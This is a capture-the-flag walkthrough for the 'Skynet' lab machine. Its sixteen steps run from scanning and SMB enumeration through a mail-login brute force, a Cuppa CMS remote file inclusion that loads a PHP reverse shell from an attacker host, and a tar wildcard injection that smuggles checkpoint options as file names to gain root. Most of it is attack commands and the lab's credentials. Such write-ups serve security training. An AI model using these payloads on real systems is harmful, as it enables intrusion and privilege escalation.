Skynet

Tasks:

  1. Deploy and compromise the vulnerable machine!:
    1. Do Usual nmap scan with nmap -sC -sV -T5 ip - Ports 22,80,110,139,143,445 open
    2. Use smbclient -L \\\\ip\\ to list shares - anonymous,milesdyson unique
    3. Login to anonymous share and download log1.txt & attention.txt - log file contains potential username or passwords. attention.txt(written by Miles Dyson) is sort of message that tells all users to change passwords due to some malicious activity. get log1.txt & get attention.txt to download the files.
    4. Directory Bruteforce with gobuster dir --wordlist=/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://ip/" --threads=100 reveals /squirrelmail which is interesting.
    5. From attention.txt as well as smb share list we can assume there is a user called milesdyson, log1.txt might be potential password, we can use this to bruteforce login page at /squirrelmail. Luckily the first password in log1.txt worked !!! [milesdyson:cyborg007haloterminator]
    6. In the email, there is samba password for user milesdyson - )s{A&2Z=F^n_E.B`
    7. Connect to milesdyson share using Username as milesdyson - smbclient -U milesdyson \\\\10.10.179.35\\milesdyson , get important.txt from notes directory - It gives information that some CMS exists at /45kra24zxs28v3yd. Doing directory bruteforce on /45kra24zxs28v3yd reveals /administrator endpoint exists inside CMS.
    8. Visiting /45kra24zxs28v3yd/administrator reveals it's Cuppa CMS, Use searchsploit cuppa & searchsploit -x 25971 to know that there is Remote File Inclusion Vulnerability at /alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt endpoint.
    9. Serve Pentest-Money PHP Reverse shell in python http server, start netcat using nc -nlvp 1234 and open http://victimip/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://attackerip:8080/php-reverse-shell.php to get reverse shell.
    10. Run python -c 'import pty; pty.spawn("/bin/bash")' to upgrade to interactive shell from default netcat terminal.
    11. cat /home/milesdyson/user.txt and submit user flag.
    12. cat /etc/crontab, There is some cron job executing every minute at /home/milesdyson/backups/backup.sh.
    13. By looking at the backup.sh we can tell that it's taking backup of files at /var/www/html every minute using tar cf /home/milesdyson/backups/backup.tgz *
    14. This is a wildcard vulnerability , cd /var/www/html, echo "chmod 4777 /bin/bash" > bash_suid.sh (Set SUID bit of bash when executed by root), echo "" > "--checkpoint-action=exec=sh bash_suid.sh", echo "" > --checkpoint=1.
    15. After 1 min when new backup task is generated, type /bin/bash -p to get root.
    16. cat /root/root.txt to get root flag and submit.

results matching ""

    No results matching ""